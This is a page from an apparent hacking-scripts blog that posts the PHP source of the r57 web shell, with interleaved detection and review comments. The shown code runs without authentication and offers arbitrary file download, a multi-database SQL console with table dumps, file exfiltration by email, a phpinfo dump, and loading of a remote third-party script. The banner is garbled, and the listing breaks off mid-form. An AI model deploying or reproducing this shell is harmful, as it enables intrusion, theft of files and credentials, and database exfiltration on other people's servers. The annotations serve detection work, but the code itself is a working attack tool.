HackingScripts

Hack Scripts for everybody

r57 Shell (encrypted)

10 Feb 2014

I’m pretty sure the r57 and c99 shells are more or less the same in what they do, but this r57 shell looks quite different from the usual c99 script.

r57 Shell Source Code

   1 <?php
   2 /******************************************************************************************************/
   3 /*                                         WW.R57.GEN.TR
   4 /*                                     #    #        #    #
   5 /*                                     #   #          #   #
   6 /*                                    #    #          #    #
   7 /*                                    #   
   8 ###   
   9 ###
  10 ###   
  11 ###   #
  12 /*                                   
  13 ###   
  14 ###  
  15 ###
  16 ###
  17 ###  
  18 ###   
  19 ###
  20 /*                                   
  21 ###   
  22 ###  
  23 ###
  24 ###
  25 ###  
  26 ###   
  27 ###
  28 /*                                   
  29 ###   
  30 ###   
  31 ###
  32 ###   
  33 ###   
  34 ###g
  35 /*                                   
  36 ####   
  37 ###
  38 ###
  39 ###
  40 ###
  41 ###
  42 ###   
  43 ####
  44 /*                                   
  45 ###
  46 ###
  47 ###
  48 ###
  49 ###
  50 ###
  51 ###
  52 ###
  53 ###
  54 ###
  55 ###
  56 ###
  57 /*                                 
  58 ###
  59 ###
  60 ###
  61 ### 
  62 ###
  63 ###
  64 ###
  65 ###
  66 ### 
  67 ###
  68 ###
  69 ####
  70 /*                                
  71 ####   
  72 ###  
  73 ###
  74 ###
  75 ###
  76 ###
  77 ###  
  78 ###   
  79 ####
  80 /*                                
  81 ####   
  82 ###  
  83 ###
  84 ###
  85 ###
  86 ###
  87 ###  
  88 ###   
  89 ####
  90 /*                                 
  91 ####   #  
  92 ###
  93 ###
  94 ###
  95 ###
  96 ###  #   
  97 ####
  98 /*                                 
  99 ####   
 100 ###  
 101 ###
 102 ###
 103 ###
 104 ###  
 105 ###   
 106 ####
 107 /*                                  
 108 ###    #   
 109 ###
 110 ###
 111 ###   #    
 112 ###
 113 /*                                   
 114 ###   #    
 115 ###
 116 ###   #    
 117 ###
 118 /*                                     
 119 ###                 
 120 ###
 121 /*                                WWW.R57.GEN.TR Hacking Shell Security
 122 /*
 123 /*
 124 /*  r57shell // r57.gen.tr
 125 /* ~~~ ????????? | Options  ~~~ */
 126 // ????? ????? | Language
 127 // $language='tur' - turkish (Turkce)
 128 $language='tur';
     // NOTE(analysis): from here to the first class definition is the web shell's
     // start-up code: settings, PHP runtime tweaks, request normalisation and an
     // optional HTTP Basic gate.
 129 // Authentication switch (the non-English half of the original comments was lost to mis-encoding)
 130 // $auth = 1; - authentication = On
 131 // $auth = 0; - authentication = Off
 132 $auth = 0;
     // NOTE(detection): as shipped $auth is 0, so the Basic-auth block further down is
     // skipped and every request handler in this file is reachable without credentials.
 133 
 134 // Login & Password for access
 135 // (CHANGE THIS!!!)
 136 // (duplicate of the next line in another language; text lost to mis-encoding)
 137 // Login & password crypted with md5, default is 'r57'
 138 $name='r57'; // user login
 139 $pass='r57'; // user password
 140 /******************************************************************************************************/
     // All PHP error output is switched off and the execution time limit is lifted;
     // the @ prefixes hide warnings when a call is not permitted by the host.
     // set_magic_quotes_runtime() and get_magic_quotes_gpc() are legacy APIs (removed in
     // PHP 7.0 and 8.0 respectively), which dates this sample to PHP 4/5-era hosts.
 141 error_reporting(0);
 142 set_magic_quotes_runtime(0);
 143 @set_time_limit(0);
 144 @ini_set('max_execution_time',0);
 145 @ini_set('output_buffering',0);
 146 $safe_mode = @ini_get('safe_mode');
 147 $version = "1.0";
     // On PHP older than 4.1.0 the superglobals are aliased to the $HTTP_*_VARS arrays.
 148 if(version_compare(phpversion(), '4.1.0') == -1)
 149  {
 150  $_POST   = &$HTTP_POST_VARS;
 151  $_GET    = &$HTTP_GET_VARS;
 152  $_SERVER = &$HTTP_SERVER_VARS;
 153  }
     // With magic_quotes_gpc enabled, the added backslashes are stripped from every
     // $_POST and $_SERVER value ($_GET is not touched here).
 154 if (@get_magic_quotes_gpc())
 155  {
 156  foreach ($_POST as $k=>$v)
 157   {
 158   $_POST[$k] = stripslashes($v);
 159   }
 160  foreach ($_SERVER as $k=>$v)
 161   {
 162   $_SERVER[$k] = stripslashes($v);
 163   }
 164  }
 165 
     // Optional HTTP Basic gate: the MD5 hex digests of the supplied user name and
     // password are compared with $name and $pass; on mismatch a 401 is sent and the
     // script exits.
     // NOTE(detection): the realm string "r57shell" in a WWW-Authenticate header and the
     // fixed 401 body below are stable strings for log and network signatures.
 166 if($auth == 1) {
 167 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
 168    {
 169    header('WWW-Authenticate: Basic realm="r57shell"');
 170    header('HTTP/1.0 401 Unauthorized');
 171    exit("<b><a href=http://www.metalteam.org>metalteam.orgs</a> : Izin Verilmedi</b>");
 172    }
 173 }
     // NOTE(detection): the $head page template assigned next contains a <SCRIPT SRC=...>
     // tag pointing at a third-party host, so any browser that renders this shell's pages
     // also requests a script from that host.
 174 $head = '<!-- ??????????  ???? -->
 175 <html>
 176 <head>
 177 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
 178 <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
 179 
 180 <STYLE>
 181 tr {
 182 BORDER-RIGHT:  #aaaaaa 1px solid;
 183 BORDER-TOP:    #E8481C 1px solid;
 184 BORDER-LEFT:   #E8481C 1px solid;
 185 BORDER-BOTTOM: #aaaaaa 1px solid;
 186 }
 187 td {
 188 BORDER-RIGHT:  #aaaaaa 1px solid;
 189 BORDER-TOP:    #E8481C 1px solid;
 190 BORDER-LEFT:   #E8481C 1px solid;
 191 BORDER-BOTTOM: #aaaaaa 1px solid;
 192 }
 193 .table1 {
 194 BORDER-RIGHT:  #396D95 0px;
 195 BORDER-TOP:    #396D95 0px;
 196 BORDER-LEFT:   #396D95 0px;
 197 BORDER-BOTTOM: #396D95 0px;
 198 BACKGROUND-COLOR: #396D95
 199 }
 200 .td1 {
 201 BORDER-RIGHT:  #396D95 0px;
 202 BORDER-TOP:    #396D95 0px;
 203 BORDER-LEFT:   #396D95 0px;
 204 BORDER-BOTTOM: #396D95 0px;
 205 font: 7pt Verdana;
 206 }
 207 .tr1 {
 208 BORDER-RIGHT:  #396D95 0px;
 209 BORDER-TOP:    #396D95 0px;
 210 BORDER-LEFT:   #396D95 0px;
 211 BORDER-BOTTOM: #396D95 0px;
 212 }
 213 table {
 214 BORDER-RIGHT:  #E8481C 1px outset;
 215 BORDER-TOP:    #E8481C 1px outset;
 216 BORDER-LEFT:   #E8481C 1px outset;
 217 BORDER-BOTTOM: #E8481C 1px outset;
 218 BACKGROUND-COLOR: #396D95;
 219 }
 220 input {
 221 BORDER-RIGHT:  #000000 1px solid;
 222 BORDER-TOP:    #FC602B 1px solid;
 223 BORDER-LEFT:   #FC602B 1px solid;
 224 BORDER-BOTTOM: #000000 1px solid;
 225 BACKGROUND-COLOR: #396D95;
 226 font: 8pt Verdana;
 227 }
 228 select {
 229 BORDER-RIGHT:  #000000 1px solid;
 230 BORDER-TOP:    #D55022 1px solid;
 231 BORDER-LEFT:   #D55022 1px solid;
 232 BORDER-BOTTOM: #000000 1px solid;
 233 BACKGROUND-COLOR: #396D95;
 234 font: 8pt Verdana;
 235 }
 236 submit {
 237 BORDER-RIGHT:  buttonhighlight 2px outset;
 238 BORDER-TOP:    buttonhighlight 2px outset;
 239 BORDER-LEFT:   buttonhighlight 2px outset;
 240 BORDER-BOTTOM: buttonhighlight 2px outset;
 241 BACKGROUND-COLOR: #396D95;
 242 width: 30%;
 243 }
 244 textarea {
 245 BORDER-RIGHT:  #000000 1px solid;
 246 BORDER-TOP:    #D55022 1px solid;
 247 BORDER-LEFT:   #D55022 1px solid;
 248 BORDER-BOTTOM: #000000 1px solid;
 249 BACKGROUND-COLOR: #396D95;
 250 font: Fixedsys bold;
 251 }
 252 BODY {
 253 margin-top: 1px;
 254 margin-right: 1px;
 255 margin-bottom: 1px;
 256 margin-left: 1px;
 257 }
 258 A:link {COLOR:orange; TEXT-DECORATION: none}
 259 A:visited { COLOR:orange; TEXT-DECORATION: none}
 260 A:active {COLOR:orange; TEXT-DECORATION: none}
 261 A:hover {color:#BF0F0F;TEXT-DECORATION: none}
 262 </STYLE>';
 263 class zipfile
 264 {
         // Builds a ZIP archive entirely in memory.
         //   $datasec      - local file header + compressed data, one string per added file
         //   $ctrl_dir     - central directory records, one string per added file
         //   $eof_ctrl_dir - end-of-central-directory signature ("PK\x05\x06") plus four zero bytes
         //   $old_offset   - running byte offset of the next local file header
 265     var $datasec      = array();
 266     var $ctrl_dir     = array();
 267     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 268     var $old_offset   = 0;
         // Converts a Unix timestamp (0 = current time) to the packed 32-bit DOS
         // date/time value. Dates before 1980 are clamped to 1980-01-01 00:00:00.
 269     function unix2DosTime($unixtime = 0) {
 270         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 271         if ($timearray['year'] < 1980) {
 272             $timearray['year']    = 1980;
 273             $timearray['mon']     = 1;
 274             $timearray['mday']    = 1;
 275             $timearray['hours']   = 0;
 276             $timearray['minutes'] = 0;
 277             $timearray['seconds'] = 0;
 278         }
 279         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
 280                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
 281     }
         // Adds one file to the archive.
         //   $data - raw file contents
         //   $name - entry name; backslashes are turned into forward slashes
         //   $time - Unix timestamp for the entry (0 = current time)
         // Appends one element to $datasec and one to $ctrl_dir and advances $old_offset.
 282     function addFile($data, $name, $time = 0)
 283     {
 284         $name     = str_replace('\\', '/', $name);
 285         $dtime    = dechex($this->unix2DosTime($time));
             // The hex digits are regrouped in reverse byte order (little-endian) as "\x.."
             // escapes and turned into raw bytes with eval().
             // NOTE(review): the eval() input comes only from dechex(), not from the request,
             // but the indexing assumes dechex() returned exactly 8 digits - TODO confirm for
             // timestamps in the early 1980s. pack('V', ...) expresses the same conversion
             // without eval().
 286         $hexdtime = '\x' . $dtime[6] . $dtime[7]
 287                   . '\x' . $dtime[4] . $dtime[5]
 288                   . '\x' . $dtime[2] . $dtime[3]
 289                   . '\x' . $dtime[0] . $dtime[1];
 290         eval('$hexdtime = "' . $hexdtime . '";');
             // Local file header: "PK\x03\x04" signature, version needed (0x14),
             // general-purpose flags (0), compression method 8 (deflate), DOS time/date.
 291         $fr   = "\x50\x4b\x03\x04";
 292         $fr   .= "\x14\x00";
 293         $fr   .= "\x00\x00";
 294         $fr   .= "\x08\x00";
 295         $fr   .= $hexdtime;
 296         $unc_len = strlen($data);
 297         $crc     = crc32($data);
 298         $zdata   = gzcompress($data);
             // Drops the last 4 bytes and the first 2 bytes of the gzcompress() output,
             // leaving the bare deflate stream that the ZIP entry stores.
 299         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 300         $c_len   = strlen($zdata);
 301         $fr      .= pack('V', $crc);
 302         $fr      .= pack('V', $c_len);
 303         $fr      .= pack('V', $unc_len);
 304         $fr      .= pack('v', strlen($name));
 305         $fr      .= pack('v', 0);
 306         $fr      .= $name;
 307         $fr .= $zdata;
 308         $this -> datasec[] = $fr;
             // Central directory record for the same entry ("PK\x01\x02" signature); it
             // repeats the sizes and CRC and stores the offset of the local header.
 309         $cdrec = "\x50\x4b\x01\x02";
 310         $cdrec .= "\x00\x00";
 311         $cdrec .= "\x14\x00";
 312         $cdrec .= "\x00\x00";
 313         $cdrec .= "\x08\x00";
 314         $cdrec .= $hexdtime;
 315         $cdrec .= pack('V', $crc);
 316         $cdrec .= pack('V', $c_len);
 317         $cdrec .= pack('V', $unc_len);
 318         $cdrec .= pack('v', strlen($name) );
 319         $cdrec .= pack('v', 0 );
 320         $cdrec .= pack('v', 0 );
 321         $cdrec .= pack('v', 0 );
 322         $cdrec .= pack('v', 0 );
 323         $cdrec .= pack('V', 32 );
 324         $cdrec .= pack('V', $this -> old_offset );
 325         $this -> old_offset += strlen($fr);
 326         $cdrec .= $name;
 327         $this -> ctrl_dir[] = $cdrec;
 328     }
         // Returns the finished archive as one binary string: all local records, the
         // central directory, then the end-of-central-directory record with the entry
         // count (written twice), the directory size, the directory offset and a
         // zero-length comment field.
 329     function file()
 330     {
 331         $data    = implode('', $this -> datasec);
 332         $ctrldir = implode('', $this -> ctrl_dir);
 333         return
 334             $data .
 335             $ctrldir .
 336             $this -> eof_ctrl_dir .
 337             pack('v', sizeof($this -> ctrl_dir)) .
 338             pack('v', sizeof($this -> ctrl_dir)) .
 339             pack('V', strlen($ctrldir)) .
 340             pack('V', strlen($data)) .
 341             "\x00\x00";
 342     }
 343 }
 344 function compress(&$filename,&$filedump,$compress)
 345  {
         // Optionally compresses a file that is about to be sent to the client.
         //   $filename  - by reference; the matching extension is appended
         //   $filedump  - by reference; replaced with the compressed bytes
         //   $compress  - 'bzip', 'gzip' or 'zip'; anything else leaves the data unchanged
         // Sets the globals $mime_type (always) and $content_encoding (gzip only).
         // A format is used only if its PHP function exists; otherwise execution falls
         // through to the octet-stream branch.
 346     global $content_encoding;
 347     global $mime_type;
 348     if ($compress == 'bzip' && @function_exists('bzcompress'))
 349      {
 350         $filename  .= '.bz2';
 351         $mime_type = 'application/x-bzip2';
 352         $filedump = bzcompress($filedump);
 353      }
 354      else if ($compress == 'gzip' && @function_exists('gzencode'))
 355      {
 356         $filename  .= '.gz';
 357         $content_encoding = 'x-gzip';
 358         $mime_type = 'application/x-gzip';
 359         $filedump = gzencode($filedump);
 360      }
 361      else if ($compress == 'zip' && @function_exists('gzcompress'))
 362      {
 363        $filename .= '.zip';
 364         $mime_type = 'application/zip';
 365         $zipfile = new zipfile();
             // substr(..., 0, -4) removes the '.zip' just appended, so the archive entry
             // carries the original file name.
 366         $zipfile -> addFile($filedump, substr($filename, 0, -4));
 367         $filedump = $zipfile -> file();
 368      }
 369      else
 370      {
 371        $mime_type = 'application/octet-stream';
 372      }
 373  }
 374 function mailattach($to,$from,$subj,$attach)
 375  {
      // Sends $attach['content'] by e-mail through PHP's mail(); returns 1 if mail()
      // reports success, otherwise 0.
      //   $attach - array with the keys 'type', 'name' and 'content', as read below
      // The base64-encoded content is appended to the header string after a blank line
      // and the message-body argument of mail() is empty.
      // NOTE(detection): this is a file-exfiltration channel; outbound mail from the web
      // server process that carries base64 file content is worth alerting on. $from and
      // $attach['name'] are placed into the headers without validation.
 376  $headers  = "From: $from\r\n";
 377  $headers .= "MIME-Version: 1.0\r\n";
 378  $headers .= "Content-Type: ".$attach['type'];
 379  $headers .= "; name=\"".$attach['name']."\"\r\n";
 380  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 381  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 382  if(@mail($to,$subj,"",$headers)) { return 1; }
 383  return 0;
 384  }
 385 class my_sql
 386  {
      // Thin wrapper that drives four database back ends through one interface; $db
      // selects the back end ('MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle').
      // It relies on the legacy mysql_*, mssql_*, pg_* and oci* extension functions and
      // prefixes most calls with @ so that driver warnings are never shown.
      // In the request handler visible later in this listing, the connection settings are
      // filled straight from POST fields.
 387  var $host = 'localhost';
 388  var $port = '';
 389  var $user = '';
 390  var $pass = '';
 391  var $base = '';
 392  var $db   = '';
 393  var $connection;
 394  var $res;
 395  var $error;
 396  var $rows;
 397  var $columns;
 398  var $num_rows;
 399  var $num_fields;
 400  var $dump;
 401 
      // Opens a connection for the selected back end. Returns 1 on success and 0 when the
      // driver function is missing, the connection fails or $db is unknown. An empty
      // $port is replaced by the back end's default (3306, 1433, 5432).
 402  function connect()
 403   {
 404    switch($this->db)
 405      {
 406     case 'MySQL':
 407      if(empty($this->port)) { $this->port = '3306'; }
 408      if(!function_exists('mysql_connect')) return 0;
 409      $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
 410      if(is_resource($this->connection)) return 1;
 411     break;
 412      case 'MSSQL':
 413       if(empty($this->port)) { $this->port = '1433'; }
 414      if(!function_exists('mssql_connect')) return 0;
 415      $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
 416       if($this->connection) return 1;
 417      break;
 418      case 'PostgreSQL':
 419       if(empty($this->port)) { $this->port = '5432'; }
          // The connection string is assembled by plain concatenation of the properties.
 420       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
 421       if(!function_exists('pg_connect')) return 0;
 422       $this->connection = @pg_connect($str);
 423       if(is_resource($this->connection)) return 1;
 424      break;
 425      case 'Oracle':
 426       if(!function_exists('ocilogon')) return 0;
 427       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
 428       if(is_resource($this->connection)) return 1;
 429      break;
 430      }
 431     return 0;
 432   }
 433 
      // Selects database $base on the open connection. Returns 1 on success, 0 on
      // failure; for PostgreSQL and Oracle it returns 1 without doing anything.
 434  function select_db()
 435   {
 436    switch($this->db)
 437     {
 438    case 'MySQL':
 439     if(@mysql_select_db($this->base,$this->connection)) return 1;
 440     break;
 441     case 'MSSQL':
 442     if(@mssql_select_db($this->base,$this->connection)) return 1;
 443     break;
 444     case 'PostgreSQL':
 445      return 1;
 446     break;
 447     case 'Oracle':
 448      return 1;
 449     break;
 450     }
 451    return 0;
 452   }
 453 
      // Runs $query verbatim and stores the driver result in $res.
      // Return codes: 0 = error ($error holds the message), 1 = a result set is
      // available, 2 = the statement ran without a result set.
 454  function query($query)
 455   {
 456    $this->res=$this->error='';
 457    switch($this->db)
 458     {
 459    case 'MySQL':
         // NOTE(detection): every MySQL statement is prefixed with a SQL comment that
         // contains a NUL byte ('/*' . chr(0) . '*/'). The source does not say why; the
         // byte sequence is a distinctive marker to search for in database query logs.
 460      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
 461       {
 462       $this->error = @mysql_error($this->connection);
 463       return 0;
 464       }
 465      else if(is_resource($this->res)) { return 1; }
 466      return 2;
 467    break;
 468     case 'MSSQL':
 469      if(false===($this->res=@mssql_query($query,$this->connection)))
 470       {
 471       $this->error = 'Query error';
 472       return 0;
 473       }
 474       else if(@mssql_num_rows($this->res) > 0) { return 1; }
 475      return 2;
 476     break;
 477     case 'PostgreSQL':
 478      if(false===($this->res=@pg_query($this->connection,$query)))
 479       {
 480       $this->error = @pg_last_error($this->connection);
 481       return 0;
 482       }
 483       else if(@pg_num_rows($this->res) > 0) { return 1; }
 484      return 2;
 485     break;
 486     case 'Oracle':
         // A parse or execute failure only sets $error and then falls through to the
         // final "return 0" below.
 487      if(false===($this->res=@ociparse($this->connection,$query)))
 488       {
 489       $this->error = 'Query parse error';
 490       }
 491      else
 492       {
 493       if(@ociexecute($this->res))
 494        {
 495        if(@ocirowcount($this->res) != 0) return 2;
 496        return 1;
 497        }
 498       $error = @ocierror();
 499       $this->error=$error['message'];
 500       }
 501     break;
 502     }
 503   return 0;
 504   }
      // Fetches the whole result in $res into $rows (associative arrays), sets $num_rows,
      // $num_fields and $columns (the keys of the first row) and frees the result.
      // Returns 1 if at least one row was counted, otherwise 0.
      // Because the fetch is assigned inside the loop condition, the terminating false is
      // also appended as the last element of $rows.
 505  function get_result()
 506   {
 507    $this->rows=array();
 508    $this->columns=array();
 509    $this->num_rows=$this->num_fields=0;
 510    switch($this->db)
 511     {
 512    case 'MySQL':
 513     $this->num_rows=@mysql_num_rows($this->res);
 514     $this->num_fields=@mysql_num_fields($this->res);
 515     while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
 516     @mysql_free_result($this->res);
 517     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 518     break;
 519     case 'MSSQL':
 520     $this->num_rows=@mssql_num_rows($this->res);
 521     $this->num_fields=@mssql_num_fields($this->res);
 522     while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
 523     @mssql_free_result($this->res);
 524     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
 525     break;
 526     case 'PostgreSQL':
 527     $this->num_rows=@pg_num_rows($this->res);
 528     $this->num_fields=@pg_num_fields($this->res);
 529     while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
 530     @pg_free_result($this->res);
 531     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 532     break;
 533     case 'Oracle':
         // No row-count call is made for Oracle; rows are counted while fetching.
 534      $this->num_fields=@ocinumcols($this->res);
 535      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
 536      @ocifreestatement($this->res);
 537      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 538     break;
 539     }
 540    return 0;
 541   }
      // Builds a textual dump of $table in $this->dump: a header block, then (MySQL
      // only) the CREATE TABLE statement, then one INSERT statement per row.
      // Returns 1 on success and 0 for an empty table name, a failed query, an empty
      // result or an unknown back end. The Oracle branch only writes a placeholder.
      // $table is concatenated into the SQL text as given.
      // NOTE(review): several header literals below are split across two listing lines
      // inside the quotes; this looks like damage from the page extraction - confirm
      // against another copy before relying on the exact header text.
 542  function dump($table)
 543   {
 544    if(empty($table)) return 0;
 545    $this->dump=array();
 546    $this->dump[0] = '
 547 ###';
 548    $this->dump[1] = '
 549 ### --------------------------------------- ';
 550    $this->dump[2] = '
 551 ###  Created: '.date ("d/m/Y H:i:s");
 552    $this->dump[3] = '
 553 ### Database: '.$this->base;
 554    $this->dump[4] = '
 555 ###    Table: '.$table;
 556    $this->dump[5] = '
 557 ### --------------------------------------- ';
 558    switch($this->db)
 559     {
 560    case 'MySQL':
 561     $this->dump[0] = '
 562 ### MySQL dump';
 563     if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
 564     if(!$this->get_result()) return 0;
 565     $this->dump[] = $this->rows[0]['Create Table'];
 566      $this->dump[] = '
 567 ### --------------------------------------- ';
 568     if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
 569     if(!$this->get_result()) return 0;
 570     for($i=0;$i<$this->num_rows;$i++)
 571      {
 572       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 573      $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 574      }
 575     break;
 576     case 'MSSQL':
 577      $this->dump[0] = '
 578 ### MSSQL dump';
 579      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 580     if(!$this->get_result()) return 0;
 581     for($i=0;$i<$this->num_rows;$i++)
 582      {
 583       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 584      $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 585      }
 586     break;
 587     case 'PostgreSQL':
 588      $this->dump[0] = '
 589 ### PostgreSQL dump';
 590      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 591     if(!$this->get_result()) return 0;
 592     for($i=0;$i<$this->num_rows;$i++)
 593      {
 594       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 595      $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 596      }
 597     break;
 598     case 'Oracle':
 599       $this->dump[0] = '
 600 ### ORACLE dump';
 601       $this->dump[]  = '
 602 ### under construction';
 603     break;
 604     default:
 605      return 0;
 606     break;
 607     }
 608    return 1;
 609   }
      // Closes the connection of the selected back end; does nothing for an unknown $db.
 610  function close()
 611   {
 612    switch($this->db)
 613     {
 614    case 'MySQL':
 615     @mysql_close($this->connection);
 616     break;
 617     case 'MSSQL':
 618      @mssql_close($this->connection);
 619     break;
 620     case 'PostgreSQL':
 621      @pg_close($this->connection);
 622     break;
 623     case 'Oracle':
 624      @oci_close($this->connection);
 625     break;
 626     }
 627   }
      // Returns the driver's affected-row count for $res, or 0 for an unknown $db.
 628  function affected_rows()
 629   {
 630    switch($this->db)
 631     {
 632    case 'MySQL':
 633     return @mysql_affected_rows($this->res);
 634     break;
 635     case 'MSSQL':
 636      return @mssql_affected_rows($this->res);
 637     break;
 638     case 'PostgreSQL':
 639      return @pg_affected_rows($this->res);
 640     break;
 641     case 'Oracle':
 642      return @ocirowcount($this->res);
 643     break;
 644     default:
 645      return 0;
 646     break;
 647     }
 648   }
 649  }
 650 if(isset($_GET['img'])&&!empty($_GET['img']))
 651  {
      // Serves one of two small GIF images embedded as base64, selected by the img query
      // parameter, then ends the request. The value of $_GET['img'] is used directly as
      // the array index.
 652  $images = array();
 653  $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
 654  $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
 655  @ob_clean();
 656  header("Content-type: image/gif");
 657  echo base64_decode($images[$_GET['img']]);
 658  die();
 659  }
 660 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 661  {
       // File download handler: opens the path given in the d_name POST field, reads the
       // whole file, optionally compresses it via compress() and returns it as an
       // attachment. The path is taken from the request as-is, so any file readable by
       // the web server account can be retrieved.
       // If the file cannot be opened, the result of re() (a helper defined outside this
       // part of the listing) is echoed and cmd is cleared so processing continues.
       // NOTE(detection): POST requests carrying cmd=download_file together with d_name
       // and compress fields, answered with Content-disposition: attachment, are a
       // recognisable pattern in web server and WAF logs.
 662   if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
 663   else
 664    {
 665     @ob_clean();
 666     $filename = @basename($_POST['d_name']);
 667     $filedump = @fread($file,@filesize($_POST['d_name']));
 668     fclose($file);
 669     $content_encoding=$mime_type='';
 670     compress($filename,$filedump,$_POST['compress']);
 671     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
 672     header("Content-type: ".$mime_type);
 673     header("Content-disposition: attachment; filename=\"".$filename."\";");
 674     echo $filedump;
 675     exit();
 676    }
 677  }
 678 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">Geri</a> ]</b></font></div>"; die(); }
     // The line above prints the full phpinfo() page when the phpinfo query parameter is
     // present, adds a back link built from PHP_SELF and ends the request.
     // NOTE(detection): this discloses the complete PHP configuration and environment of
     // the host; requests with a bare phpinfo parameter to an unexpected script are worth
     // flagging.
 679 if ($_POST['cmd']=="db_query")
 680  {
      // SQL console handler: builds a my_sql object from POST fields (back end, server,
      // port, login, password, database), splits the submitted text on ';' and runs every
      // piece longer than 5 characters. Result columns and values are HTML-escaped before
      // being printed; the form is then re-emitted with the same connection fields as
      // hidden inputs. in() is a helper defined outside this part of the listing.
      // NOTE(detection): POST requests with cmd=db_query plus db, db_server, db_port,
      // mysql_l, mysql_p, mysql_db and db_query fields identify use of this console, and
      // the database credentials travel in the request body and in the returned page.
 681  echo $head;
 682  $sql = new my_sql();
 683  $sql->db   = $_POST['db'];
 684  $sql->host = $_POST['db_server'];
 685  $sql->port = $_POST['db_port'];
 686  $sql->user = $_POST['mysql_l'];
 687  $sql->pass = $_POST['mysql_p'];
 688  $sql->base = $_POST['mysql_db'];
 689  $querys = @explode(';',$_POST['db_query']);
 690 
 691  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Sql Server ile Baglant? Kurulamad? </b></font></div>";
 692   else
 693    {
 694    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>DataBase Girilmedi</b></font></div>";
 695    else
 696     {
 697     foreach($querys as $num=>$query)
 698      {
 699       if(strlen($query)>5)
 700       {
 701       echo "<font face=Verdana size=-2 color=white><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
           // query() returns the integers 0, 1 or 2; the string case labels below match
           // them through PHP's loose switch comparison.
 702       switch($sql->query($query))
 703        {
 704        case '0':
 705        echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
 706        break;
 707        case '1':
 708        if($sql->get_result())
 709         {
 710            echo "<table width=100%>";
 711         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
 712            $keys = @implode("&nbsp;</b></font></td><td bgcolor=#396D95><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
 713         echo "<tr><td bgcolor=#396D95><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
 714         for($i=0;$i<$sql->num_rows;$i++)
 715          {
 716          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
 717          $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
 718          echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
 719          }
 720         echo "</table>";
 721         }
 722        break;
 723        case '2':
 724        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
 725        echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
 726        break;
 727        }
 728       }
 729      }
 730     }
 731    }
 732  echo "<br><form name=form method=POST>";
 733  echo in('hidden','db',0,$_POST['db']);
 734  echo in('hidden','db_server',0,$_POST['db_server']);
 735  echo in('hidden','db_port',0,$_POST['db_port']);
